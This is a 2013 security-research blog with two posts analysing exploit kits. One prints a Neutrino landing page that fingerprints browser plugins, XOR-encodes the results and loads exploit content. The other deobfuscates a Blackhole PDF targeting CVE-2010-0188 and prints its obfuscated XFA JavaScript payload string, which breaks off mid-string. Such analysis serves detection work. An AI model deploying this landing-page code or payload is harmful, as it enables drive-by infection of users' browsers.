Tuesday, April 23, 2013

Neutrino Exploit Kit Landing pane change or variation


I picked up this today and it seem like the landing pane of Neutrino has changed. Gone is the random string generation after the prefixed h, i and p HTTP POST variables. The HTTP URL c(random string) is also hardcoded instead of random generated. The HTTP post request is also changed as there is no more h(random string). The i(random string) variable has grown beyond the previous limit of max 11 chars.

For the previous landing I have seen(reported by @kafeine and @malwaresigs) look at this post.
For a more thorough analysis look at "Neutrino Exploit Kit Analysis".

The new landing pane


<!DOCTYPE HTML>
<html>
    
    <head>
        <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
        <script type="text/javascript" src="scripts/js/plugin_detector.js"></script>
        <script type="text/javascript">
            $(document).ready(function () {АН
                602(
                    '517679ebaba2cc891d009dee',
                    'gbdlnep',
                    'cxiqocvbqd',
                    'pcnfjrcxxpu',
                    'ivexxbpclutvfxs');
            });

            function\ u0410\ u041d602(a, c, d, b, e) {
                a = {
                    hid: a,
                    plugins: {
                        adobe_reader: PluginDetect.getVersion("AdobeReader"),
                        java: PluginDetect.getVersion("Java"),
                        flash: PluginDetect.getVersion("Flash"),
                        quick_time: PluginDetect.getVersion("QuickTime"),
                        real_player: PluginDetect.getVersion("RealPlayer"),
                        shockwave: PluginDetect.getVersion("Shockwave"),
                        silver_light: PluginDetect.getVersion("Silverlight"),
                        vlc: PluginDetect.getVersion("VLC"),
                        wmp: PluginDetect.getVersion("WMP")
                    }
                };
                var f = {};
                f[b] = c;
                f[e] = encodeURIComponent(xor(JSON.stringify(a),
                    c));
                $.post(d, f, function (a) {
                    $("body").append(xor(decodeURIComponent(a), c))
                })
            }
            function xor(a, c) {
                for (var d = "", b = 0, e = 0, b = 0; b < a.length; b++) e = Math.floor(b % c.length), d += String.fromCharCode(a.charCodeAt(b) ^ c.charCodeAt(e));
                return d
            }
            JSON.stringify = JSON.stringify || function (a) {
                var c = typeof a;
                if ("object" != c || null === a) return "string" == c && (a = '"' + a + '"'), String(a);
                var d, b, e = [],
                    f = a && a.constructor == Array;
                for (d in a) b = a[d], c = typeof b, "string" == c ? b = '"' + b + '"' : "object" == c && null !== b && (b = JSON.stringify(b)), e.push((f ? "" : '"' + d + '":') + String(b));
                return (f ? "[" : "{") + String(e) + (f ? "]" : "}")
            };
        </script>
    </head>
    
    <body></body>

</html>


These changes gives us a new HTTP POST as well





If I'm wrong - Please correct me

Happy detecting Neutrino exploit kits :)

Thursday, April 18, 2013

Blackhole Exploit Kit - deobfuscating the CVE-2010-0188 PDF


After looking at Styx pdf for cve-2010-0188 I thought it might be fun to take a quick look at the blackhole pdf cve-2010-0188 as well. How to fetch it is explained here.
I even managed to throw in a tiny piece of Python code, so we can enjoy some wiered Monty Python reference further down :)

Here is how it goes...

1. PDF overview



Lots of streams to look into. First lets check if pdf.py can give us more info and if threre is JavaScript in there somewhere.


No luck there. probably a JavaScript in there somewhere though so lets keep on looking.
Lets try to extract the streams with pdfextract:


hmmm no such luck. 
Let's go through it piece by piece with pyew then:



So a lot of gzipped content... Lets view the streams with pdfvi


Stream no 8. Bingo this looks like something worth investigating further.

2. The JavaScript from the PDF


<template><subform name="form1"><pageSet><pageArea><contentArea h="1O.5in" w="8in" x="O.25in" y="O.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="1O.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.O5mm"><ui><imageEdit></imageEdit></ui><event activity="initialize" xmlns:xfa="http://testset.com">
<xfa:script contentType='application/x-javascript'>
if(ImageField1.rawValue===null)p="parseIn&#116;";
pp="&#1O2;romCharCode";
a='53**^!@#**48**4P**1L**4N**^!@#**48**4B**4B**4G**^!@#**4L**4E**2M**53**^!@#**48**4P**1L**49**^!@#**49**49**27**1L**^!@#**4A**4A**4A**27**^!@#**1L**4B**4B**4B**^!@#**27**1L**4C**4C**^!@#**4C**27**1L**4D**^!@#**4D**4D**27**1L**^!@#**4E**4E**4E**27**^!@#**1L**4F**4F**4F**^!@#**2M**53**48**4P**^!@#**1L**4N**4M**4G**^!@#**4L**51**4C**4P**^!@#**5O**46**48**27**^!@#**1L**4G**2M**53**^!@#**48**4P**1L**55**^!@#**1L**2O**1L**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**53**^!@#**48**4P**1L**56**^!@#**1L**2O**1L**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**53**^!@#**48**4P**1L**46**^!@#**4J**2C**2O**1N**^!@#**2F**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2G**2C**2I**^!@#**2J**2B**2F**48**^!@#**2E**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**4D**2H**2E**^!@#**2J**2B**2F**48**^!@#**48**2E**4C**49**^!@#**2J**2B**2F**48**^!@#**2E**2B**2D**2B**^!@#**2J**2D**2F**48**^!@#**2H**4C**2D**4D**^!@#**2J**2B**2F**48**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2D**2H**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2C**2D**2E**2K**^!@#**2J**2B**2F**48**^!@#**2H**2F**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2B**2B**2F**^!@#**2B**2B**2B**2B**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**1N**26**1N**2B**^!@#**2B**2B**2B**2G**^!@#**2H**2E**2H**4B**^!@#**2H**2K**2I**4B**^!@#**2E**4D**2H**2F**^!@#**2H**2E**2H**2H**^!@#**2D**2D**2H**4A**^!@#**2H**2J**2I**2E**^!@#**2H**2D**2H**4B**^!@#**2E**2F**2I**2F**^!@#**2H**2I**2H**2C**^!@#**2I**2H**2I**4C**^!@#**2H**2H**2D**2K**^!@#**2H**2C**2E**4B**^!@#**2E**2K**2H**4D**^!@#**2H**2G**2I**2E**^!@#**2I**2H**2D**4D**^!@#**2H**2C**2E**48**^!@#**2E**2C**2E**2E**^!@#**2E**48**2E**2H**^!@#**2I**2D**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**2E**^!@#**2E**2E**2E**48**^!@#**2E**2D**2E**2E**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**2I**2H**2C**^!@#**2E**4B**2E**2G**^!@#**2H**2B**2I**4D**^!@#**2H**2G**2H**2C**^!@#**2I**2G**2I**2H**^!@#**2H**4B**2H**2H**^!@#**2D**48**2H**2C**^!@#**2E**48**2E**2B**^!@#**2E**2E**2E**48**^!@#**2E**2K**2H**2C**^!@#**2E**48**2E**49**^!@#**2H**2C**2E**48**^!@#**2E**2J**2H**2C**^!@#**2E**4B**2E**2B**^!@#**2I**2E**2I**2H**^!@#**2H**4D**2E**2B**^!@#**2I**2J**2H**2B**^!@#**2I**4C**2D**2C**^!@#**2I**4D**2D**2E**^!@#**2H**2K**2E**2B**^!@#**2E**2F**2E**2K**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2H**2F**^!@#**2H**2K**2E**2C**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2E**2K**^!@#**2E**2C**2H**2J**^!@#**2E**2D**2H**2I**^!@#**2E**2K**2E**2F**^!@#**2H**2G**2E**2B**^!@#**2E**2E**2H**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2C**2H**2I**^!@#**2E**2D**2E**4D**^!@#**2D**2E**2H**2K**^!@#**2E**2B**2E**2F**^!@#**2E**2K**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2H**2F**2H**2K**^!@#**2E**2C**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2E**2K**2E**2C**^!@#**2H**2J**2E**2D**^!@#**2H**2I**2E**2K**^!@#**2E**2F**2H**2G**^!@#**2E**2B**2E**2E**^!@#**2H**2C**2H**2D**^!@#**2E**2C**2H**2D**^!@#**2E**2C**2H**2C**^!@#**2H**2I**2E**2D**^!@#**2E**4D**2D**2F**^!@#**2E**2G**2E**4C**^!@#**2D**2G**2E**2H**^!@#**2E**4C**2D**2C**^!@#**2E**2D**2E**2C**^!@#**2E**4C**2D**2K**^!@#**2E**2D**2E**2C**^!@#**2E**4D**2D**4D**^!@#**2D**48**2E**2B**^!@#**2I**2F**2I**2F**^!@#**2I**2J**2H**2B**^!@#**2I**4D**2D**48**^!@#**2C**2H**2E**2K**^!@#**2I**2H**2F**2H**^!@#**4A**49**2C**49**^!@#**2G**48**2J**48**^!@#**4A**2E**2E**4B**^!@#**49**2C**2B**4D**^!@#**2H**2K**2J**4C**^!@#**2B**48**2J**4C**^!@#**4D**2J**2K**4A**^!@#**4C**4C**2B**4C**^!@#**2F**4C**2J**4D**^!@#**4D**4D**4D**4C**^!@#**4D**4A**2K**2J**^!@#**4C**2J**2B**2H**^!@#**2G**4D**4D**4C**^!@#**4D**48**2H**2B**^!@#**2B**48**2H**2F**^!@#**4A**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**48**^!@#**4D**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**2E**^!@#**2C**49**4C**2D**^!@#**2B**49**4C**4A**^!@#**2B**2E**4A**2E**^!@#**2J**2F**2B**2H**^!@#**2G**4D**4D**2E**^!@#**2G**4A**2B**49**^!@#**4C**2E**2J**2B**^!@#**2B**48**2H**2F**^!@#**2B**2H**2G**4D**^!@#**4D**2E**2G**2B**^!@#**2B**48**2H**2H**^!@#**2C**2G**2I**2B**^!@#**4A**2G**2J**2F**^!@#**2C**2H**2G**4D**^!@#**4D**2B**2B**48**^!@#**2H**2I**2G**2E**^!@#**2G**2B**2B**48**^!@#**2H**2B**2B**48**^!@#**2H**2C**2G**2C**^!@#**2F**2F**2B**4B**^!@#**2C**2F**2F**2J**^!@#**2J**2B**2E**2F**^!@#**2B**2C**4A**48**^!@#**2J**2K**2G**2B**^!@#**2B**2K**2B**4B**^!@#**2C**2F**2F**2H**^!@#**4A**4A**2H**4A**^!@#**2H**2F**2H**4C**^!@#**2D**2G**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2F**2I**2D**^!@#**2H**2B**2I**2I**^!@#**2I**2B**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2C**2G**2K**^!@#**4A**2E**2E**2J**^!@#**4C**49**2J**4A**^!@#**2B**2H**2G**4D**^!@#**4D**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4D**2J**2H**2E**^!@#**2G**2B**2D**2E**^!@#**2I**4B**2D**2B**^!@#**2D**2J**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2D**2E**2E**^!@#**2E**2D**2I**2H**^!@#**2I**2F**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2E**2I**2I**^!@#**2H**2G**2H**2D**^!@#**2I**2F**2D**2F**^!@#**2B**2I**4A**4A**^!@#**2B**2F**2D**4A**^!@#**2G**4B**2J**2B**^!@#**2B**2B**2B**2C**^!@#**2B**2F**2B**4A**^!@#**4C**2C**2J**2D**^!@#**2I**49**4C**2D**^!@#**2B**49**4C**4D**^!@#**4D**4D**4D**4D**^!@#**4D**2C**2H**2J**^!@#**4C**2J**4C**49**^!@#**2J**2J**2B**2F**^!@#**4A**2E**2J**2H**^!@#**2C**4D**4D**2F**^!@#**2G**4B**2H**4A**^!@#**2H**2D**2I**2G**^!@#**2I**2J**2H**2B**^!@#**2B**2B**2B**4C**^!@#**2H**4D**2H**2J**^!@#**2H**2E**4C**4D**^!@#**4D**2G**2B**2E**^!@#**4A**2E**2J**2B**^!@#**2C**4C**2G**49**^!@#**2J**4A**4C**49**^!@#**2J**2G**2G**2B**^!@#**2G**2K**2C**2B**^!@#**4A**2E**2J**2B**^!@#**2G**2B**2B**2B**^!@#**2B**2B**2B**4D**^!@#**4D**2J**2H**2B**^!@#**2F**48**2H**2B**^!@#**2G**2J**2G**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4C**2K**4D**2D**^!@#**4C**4D**4D**4D**^!@#**4D**4D**4D**2J**^!@#**2K**2J**4C**2K**^!@#**2G**2G**2B**48**^!@#**2H**2I**4D**49**^!@#**2J**2J**2B**2J**^!@#**2H**49**2J**2E**^!@#**4D**49**4C**2H**^!@#**2K**2E**2B**2F**^!@#**2I**2E**2E**4A**^!@#**2B**4B**2I**2B**^!@#**2J**2B**2D**2J**^!@#**2H**49**2J**4B**^!@#**48**2E**2G**49**^!@#**4C**2E**4A**2K**^!@#**2G**4C**2G**49**^!@#**48**2G**4A**2E**^!@#**2B**49**2J**2F**^!@#**2B**49**2J**4B**^!@#**4B**2E**2B**2J**^!@#**4B**49**2J**4A**^!@#**2B**2F**2D**2F**^!@#**2G**4D**4D**4A**^!@#**4C**2H**2F**4B**^!@#**2J**49**2F**4A**^!@#**2B**49**2J**2H**^!@#**2H**4B**4B**2E**^!@#**2B**2F**2D**4C**^!@#**2G**49**2J**4C**^!@#**2G**2H**4C**2G**^!@#**2I**4D**2C**49**^!@#**2E**2C**4D**49**^!@#**4C**2B**2F**48**^!@#**4B**2E**2B**4B**^!@#**2B**49**4A**2C**^!@#**4A**2J**2B**2F**^!@#**2I**2D**4D**2J**^!@#**2E**2B**2C**4C**^!@#**49**4D**2B**49**^!@#**4B**2E**2E**2G**^!@#**4A**2E**2B**4B**^!@#**48**4A**4D**2C**^!@#**2F**2K**2F**2K**^!@#**4A**2E**2E**2G**^!@#**4D**2E**2B**2B**^!@#**2D**2H**2I**49**^!@#**2J**2H**2G**2G**^!@#**4D**2E**2B**2J**^!@#**2I**2G**2E**2F**^!@#**2I**49**2J**4A**^!@#**2E**2G**2I**49**^!@#**2J**2H**2G**2C**^!@#**2G**4A**2F**49**^!@#**4C**2K**4C**2C**^!@#**2G**2G**2I**2F**^!@#**4C**2G**2J**2F**^!@#**2D**2F**2E**2I**^!@#**2J**49**4D**2G**^!@#**2I**2H**2B**2K**^!@#**2E**2H**2F**2E**^!@#**4A**2B**2E**2B**^!@#**2F**49**2J**2J**^!@#**49**4D**4D**4D**^!@#**4D**2B**2C**2G**^!@#**2C**4C**4C**2C**^!@#**2J**4A**2D**2E**^!@#**2E**2F**2I**2E**^!@#**2B**4A**2E**4C**^!@#**2G**49**2J**2H**^!@#**2H**49**4B**2E**^!@#**2E**2J**2B**2H**^!@#**2I**49**2J**2H**^!@#**2G**4A**2C**2B**^!@#**2I**49**2J**4A**^!@#**2B**2B**2F**49**^!@#**2J**2B**2E**2B**^!@#**2F**49**2J**2F**^!@#**2H**2B**4A**2E**^!@#**2E**4D**2G**2K**^!@#**4C**2F**2E**2G**^!@#**2I**2F**4C**2G**^!@#**2J**4A**4D**4A**^!@#**4D**2F**4C**2E**^!@#**2J**2H**2H**1N**^!@#**29**5O**4N**4J**^!@#**4G**51**23**22**^!@#**22**24**29**4P**^!@#**4C**53**4C**4P**^!@#**5O**4C**23**24**^!@#**29**4H**4M**4G**^!@#**4L**23**22**22**^!@#**24**29**4P**4C**^!@#**4N**4J**48**4A**^!@#**4C**23**2A**2M**^!@#**2A**4E**27**22**^!@#**22**24**2M**53**^!@#**48**4P**1L**46**^!@#**4J**2D**2O**1N**^!@#**2F**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**48**2G**2H**2E**^!@#**2J**2B**2F**48**^!@#**2E**4A**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2K**2H**2D**2C**^!@#**2J**2B**2F**48**^!@#**2K**2B**2C**4D**^!@#**2J**2B**2F**48**^!@#**2E**2B**2K**2B**^!@#**2J**2F**2F**48**^!@#**2I**4B**2I**4C**^!@#**2J**2B**2F**48**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2D**2H**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2B**^!@#**2I**2C**2J**2J**^!@#**2J**2B**2F**48**^!@#**2H**2F**2D**2B**^!@#**2H**2B**2B**4D**^!@#**2B**2B**2B**2F**^!@#**2B**2B**2B**2B**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**2F**2C**2F**2C**^!@#**1N**26**1N**2B**^!@#**2B**2B**2B**2G**^!@#**2H**2E**2H**4B**^!@#**2H**2K**2I**4B**^!@#**2E**4D**2H**2F**^!@#**2H**2E**2H**2H**^!@#**2D**2D**2H**4A**^!@#**2H**2J**2I**2E**^!@#**2H**2D**2H**4B**^!@#**2E**2F**2I**2F**^!@#**2H**2I**2H**2C**^!@#**2I**2H**2I**4C**^!@#**2H**2H**2D**2K**^!@#**2H**2C**2E**4B**^!@#**2E**2K**2H**4D**^!@#**2H**2G**2I**2E**^!@#**2I**2H**2D**4D**^!@#**2H**2C**2E**48**^!@#**2E**2C**2E**2E**^!@#**2E**48**2E**2H**^!@#**2I**2D**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**4C**2H**2C**^!@#**2E**48**2E**2E**^!@#**2E**2E**2E**48**^!@#**2E**2D**2E**2E**^!@#**2E**48**2E**4C**^!@#**2H**2C**2E**48**^!@#**2E**2I**2H**2C**^!@#**2E**4B**2E**2G**^!@#**2H**2B**2I**4D**^!@#**2H**2G**2H**2C**^!@#**2I**2G**2I**2H**^!@#**2H**4B**2H**2H**^!@#**2D**48**2H**2C**^!@#**2E**48**2E**2B**^!@#**2E**2E**2E**48**^!@#**2E**2K**2H**2C**^!@#**2E**48**2E**49**^!@#**2H**2C**2E**48**^!@#**2E**2J**2H**2C**^!@#**2E**4B**2E**2B**^!@#**2I**2E**2I**2H**^!@#**2H**4D**2E**2B**^!@#**2I**2J**2H**2B**^!@#**2I**4C**2D**2C**^!@#**2I**4D**2D**2E**^!@#**2H**2K**2E**2B**^!@#**2E**2F**2E**2K**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2H**2F**^!@#**2H**2K**2E**2C**^!@#**2E**2G**2E**2E**^!@#**2E**2D**2E**2K**^!@#**2E**2C**2H**2J**^!@#**2E**2D**2H**2I**^!@#**2E**2K**2E**2F**^!@#**2H**2G**2E**2B**^!@#**2E**2E**2H**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2D**2E**2C**^!@#**2H**2C**2H**2I**^!@#**2E**2D**2E**4D**^!@#**2D**2E**2H**2K**^!@#**2E**2B**2E**2F**^!@#**2E**2K**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2H**2F**2H**2K**^!@#**2E**2C**2E**2G**^!@#**2E**2E**2E**2D**^!@#**2E**2K**2E**2C**^!@#**2H**2J**2E**2D**^!@#**2H**2I**2E**2K**^!@#**2E**2F**2H**2G**^!@#**2E**2B**2E**2E**^!@#**2H**2C**2H**2D**^!@#**2E**2C**2H**2D**^!@#**2E**2C**2H**2C**^!@#**2H**2I**2E**2D**^!@#**2E**4D**2D**2F**^!@#**2E**2G**2E**4C**^!@#**2D**2G**2E**2H**^!@#**2E**4C**2D**2C**^!@#**2E**2D**2E**2C**^!@#**2E**4C**2D**2K**^!@#**2E**2D**2E**2C**^!@#**2E**4D**2D**4D**^!@#**2D**48**2E**2B**^!@#**2I**2F**2I**2F**^!@#**2I**2J**2H**2B**^!@#**2I**4D**2D**48**^!@#**2C**2H**2E**2K**^!@#**2I**2H**2F**2H**^!@#**4A**49**2C**49**^!@#**2G**48**2J**48**^!@#**4A**2E**2E**4B**^!@#**49**2C**2B**4D**^!@#**2H**2K**2J**4C**^!@#**2B**48**2J**4C**^!@#**4D**2J**2K**4A**^!@#**4C**4C**2B**4C**^!@#**2F**4C**2J**4D**^!@#**4D**4D**4D**4C**^!@#**4D**4A**2K**2J**^!@#**4C**2J**2B**2H**^!@#**2G**4D**4D**4C**^!@#**4D**48**2H**2B**^!@#**2B**48**2H**2F**^!@#**4A**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**48**^!@#**4D**2G**2I**2B**^!@#**2B**4D**2E**2B**^!@#**2J**2I**2F**2E**^!@#**2C**49**4C**2D**^!@#**2B**49**4C**4A**^!@#**2B**2E**4A**2E**^!@#**2J**2F**2B**2H**^!@#**2G**4D**4D**2E**^!@#**2G**4A**2B**49**^!@#**4C**2E**2J**2B**^!@#**2B**48**2H**2F**^!@#**2B**2H**2G**4D**^!@#**4D**2E**2G**2B**^!@#**2B**48**2H**2H**^!@#**2C**2G**2I**2B**^!@#**4A**2G**2J**2F**^!@#**2C**2H**2G**4D**^!@#**4D**2B**2B**48**^!@#**2H**2I**2G**2E**^!@#**2G**2B**2B**48**^!@#**2H**2B**2B**48**^!@#**2H**2C**2G**2C**^!@#**2F**2F**2B**4B**^!@#**2C**2F**2F**2J**^!@#**2J**2B**2E**2F**^!@#**2B**2C**4A**48**^!@#**2J**2K**2G**2B**^!@#**2B**2K**2B**4B**^!@#**2C**2F**2F**2H**^!@#**4A**4A**2H**4A**^!@#**2H**2F**2H**4C**^!@#**2D**2G**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2F**2I**2D**^!@#**2H**2B**2I**2I**^!@#**2I**2B**2B**4B**^!@#**2C**2F**2F**2I**^!@#**4A**2C**2G**2K**^!@#**4A**2E**2E**2J**^!@#**4C**49**2J**4A**^!@#**2B**2H**2G**4D**^!@#**4D**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4D**2J**2H**2E**^!@#**2G**2B**2D**2E**^!@#**2I**4B**2D**2B**^!@#**2D**2J**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2D**2E**2E**^!@#**2E**2D**2I**2H**^!@#**2I**2F**2B**2F**^!@#**2D**2F**2F**2I**^!@#**4A**2E**2I**2I**^!@#**2H**2G**2H**2D**^!@#**2I**2F**2D**2F**^!@#**2B**2I**4A**4A**^!@#**2B**2F**2D**4A**^!@#**2G**4B**2J**2B**^!@#**2B**2B**2B**2C**^!@#**2B**2F**2B**4A**^!@#**4C**2C**2J**2D**^!@#**2I**49**4C**2D**^!@#**2B**49**4C**4D**^!@#**4D**4D**4D**4D**^!@#**4D**2C**2H**2J**^!@#**4C**2J**4C**49**^!@#**2J**2J**2B**2F**^!@#**4A**2E**2J**2H**^!@#**2C**4D**4D**2F**^!@#**2G**4B**2H**4A**^!@#**2H**2D**2I**2G**^!@#**2I**2J**2H**2B**^!@#**2B**2B**2B**4C**^!@#**2H**4D**2H**2J**^!@#**2H**2E**4C**4D**^!@#**4D**2G**2B**2E**^!@#**4A**2E**2J**2B**^!@#**2C**4C**2G**49**^!@#**2J**4A**4C**49**^!@#**2J**2G**2G**2B**^!@#**2G**2K**2C**2B**^!@#**4A**2E**2J**2B**^!@#**2G**2B**2B**2B**^!@#**2B**2B**2B**4D**^!@#**4D**2J**2H**2B**^!@#**2F**48**2H**2B**^!@#**2G**2J**2G**2B**^!@#**2B**2B**2B**2B**^!@#**2B**2B**2B**2J**^!@#**4C**2K**4D**2D**^!@#**4C**4D**4D**4D**^!@#**4D**4D**4D**2J**^!@#**2K**2J**4C**2K**^!@#**2G**2G**2B**48**^!@#**2H**2I**4D**49**^!@#**2J**2J**2B**2J**^!@#**2H**49**2J**2E**^!@#**4D**49**4C**2H**^!@#**2K**2E**2B**2F**^!@#**2I**2E**2E**4A**^!@#**2B**4B**2I**2B**^!@#**2J**2B**2D**2J**^!@#**2H**49**2J**4B**^!@#**48**2E**2G**49**^!@#**4C**2E**4A**2K**^!@#**2G**4C**2G**49**^!@#**48**2G**4A**2E**^!@#**2B**49**2J**2F**^!@#**2B**49**2J**4B**^!@#**4B**2E**2B**2J**^!@#**4B**49**2J**4A**^!@#**2B**2F**2D**2F**^!@#**2G**4D**4D**4A**^!@#**4C**2H**2F**4B**^!@#**2J**49**2F**4A**^!@#**2B**49**2J**2H**^!@#**2H**4B**4B**2E**^!@#**2B**2F**2D**4C**^!@#**2G**49**2J**4C**^!@#**2G**2H**4C**2G**^!@#**2I**4D**2C**49**^!@#**2E**2C**4D**49**^!@#**4C**2B**2F**48**^!@#**4B**2E**2B**4B**^!@#**2B**49**4A**2C**^!@#**4A**2J**2B**2F**^!@#**2I**2D**4D**2J**^!@#**2E**2B**2C**4C**^!@#**49**4D**2B**49**^!@#**4B**2E**2E**2G**^!@#**4A**2E**2B**4B**^!@#**48**4A**4D**2C**^!@#**2F**2K**2F**2K**^!@#**4A**2E**2E**2G**^!@#**4D**2E**2B**2B**^!@#**2D**2H**2I**49**^!@#**2J**2H**2G**2G**^!@#**4D**2E**2B**2J**^!@#**2I**2G**2E**2F**^!@#**2I**49**2J**4A**^!@#**2E**2G**2I**49**^!@#**2J**2H**2G**2C**^!@#**2G**4A**2F**49**^!@#**4C**2K**4C**2C**^!@#**2G**2G**2I**2F**^!@#**4C**2G**2J**2F**^!@#**2D**2F**2E**2I**^!@#**2J**49**4D**2G**^!@#**2I**2H**2B**2K**^!@#**2E**2H**2F**2E**^!@#**4A**2B**2E**2B**^!@#**2F**49**2J**2J**^!@#**49**4D**4D**4D**^!@#**4D**2B**2C**2G**^!@#**2C**4C**4C**2C**^!@#**2J**4A**2D**2E**^!@#**2E**2F**2I**2E**^!@#**2B**4A**2E**4C**^!@#**2G**49**2J**2H**^!@#**2H**49**4B**2E**^!@#**2E**2J**2B**2H**^!@#**2I**49**2J**2H**^!@#**2G**4A**2C**2B**^!@#**2I**49**2J**4A**^!@#**2B**2B**2F**49**^!@#**2J**2B**2E**2B**^!@#**2F**49**2J**2F**^!@#**2H**2B**4A**2E**^!@#**2E**4D**2G**2K**^!@#**4C**2F**2E**2G**^!@#**2I**2F**4C**2G**^!@#**2J**4A**4D**4A**^!@#**4D**2F**4C**2E**^!@#**2J**2H**2H**1N**^!@#**29**5O**4N**4J**^!@#**4G**51**23**22**^!@#**22**24**29**4P**^!@#**4C**53**4C**4P**^!@#**5O**4C**23**24**^!@#**29**4H**4M**4G**^!@#**4L**23**22**22**^!@#**24**29**4P**4C**^!@#**4N**4J**48**4A**^!@#**4C**23**2A**2M**^!@#**2A**4E**27**22**^!@#**22**24**2M**46**^!@#**4J**2E**2O**48**^!@#**4N**4N**2M**46**^!@#**4J**2F**2O**4L**^!@#**4C**54**1L**32**^!@#**4P**4P**48**56**^!@#**23**24**2M**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4J**2G**23**^!@#**24**58**53**48**^!@#**4P**1L**46**4J**^!@#**2H**2O**46**4J**^!@#**2E**29**53**4G**^!@#**4C**54**4C**4P**^!@#**3N**4C**4P**5O**^!@#**4G**4M**4L**29**^!@#**51**4M**3K**51**^!@#**4P**4G**4L**4E**^!@#**23**24**2M**46**^!@#**4J**2H**2O**46**^!@#**4J**2H**29**4P**^!@#**4C**4N**4J**48**^!@#**4A**4C**23**22**^!@#**29**22**27**22**^!@#**22**24**2M**54**^!@#**4F**4G**4J**4C**^!@#**23**46**4J**2H**^!@#**29**4J**4C**4L**^!@#**4E**51**4F**2N**^!@#**2F**24**46**4J**^!@#**2H**26**2O**22**^!@#**2B**22**2M**4P**^!@#**4C**51**52**4P**^!@#**4L**1L**4N**48**^!@#**4P**5O**4C**3A**^!@#**4L**51**23**46**^!@#**4J**2H**27**2C**^!@#**2B**24**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**4J**2I**23**^!@#**46**4J**2J**27**^!@#**46**4J**2K**24**^!@#**58**54**4F**4G**^!@#**4J**4C**23**46**^!@#**4J**2J**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**25**2D**2N**^!@#**46**4J**2K**24**^!@#**46**4J**2J**26**^!@#**2O**46**4J**2J**^!@#**2M**4P**4C**51**^!@#**52**4P**4L**1L**^!@#**46**4J**2J**29**^!@#**5O**52**49**5O**^!@#**51**4P**4G**4L**^!@#**4E**23**2B**27**^!@#**46**4J**2K**2A**^!@#**2D**24**5A**4D**^!@#**52**4L**4A**51**^!@#**4G**4M**4L**1L**^!@#**46**3A**2B**23**^!@#**46**3A**2C**24**^!@#**58**46**3A**2C**^!@#**2O**52**4L**4C**^!@#**5O**4A**48**4N**^!@#**4C**23**46**3A**^!@#**2C**24**2M**4P**^!@#**4M**51**4C**35**^!@#**48**4I**2O**46**^!@#**3A**2C**29**4J**^!@#**4C**4L**4E**51**^!@#**4F**25**2D**2M**^!@#**4B**48**4I**3J**^!@#**4M**51**4C**2O**^!@#**52**4L**4C**5O**^!@#**4A**48**4N**4C**^!@#**23**22**2O**52**^!@#**2K**2B**2K**2B**^!@#**22**24**2M**5O**^!@#**4N**4P**48**56**^!@#**2O**46**4J**2I**^!@#**23**4B**48**4I**^!@#**3J**4M**51**4C**^!@#**27**2B**55**2D**^!@#**2B**2B**2B**28**^!@#**4P**4M**51**4C**^!@#**35**48**4I**24**^!@#**2M**4J**4M**55**^!@#**3O**4F**4C**4C**^!@#**2O**46**3A**2C**^!@#**26**5O**4N**4P**^!@#**48**56**2M**4J**^!@#**4M**55**3O**4F**^!@#**4C**4C**2O**46**^!@#**4J**2I**23**4J**^!@#**4M**55**3O**4F**^!@#**4C**4C**27**2G**^!@#**2D**2F**2B**2K**^!@#**2J**24**2M**4D**^!@#**4M*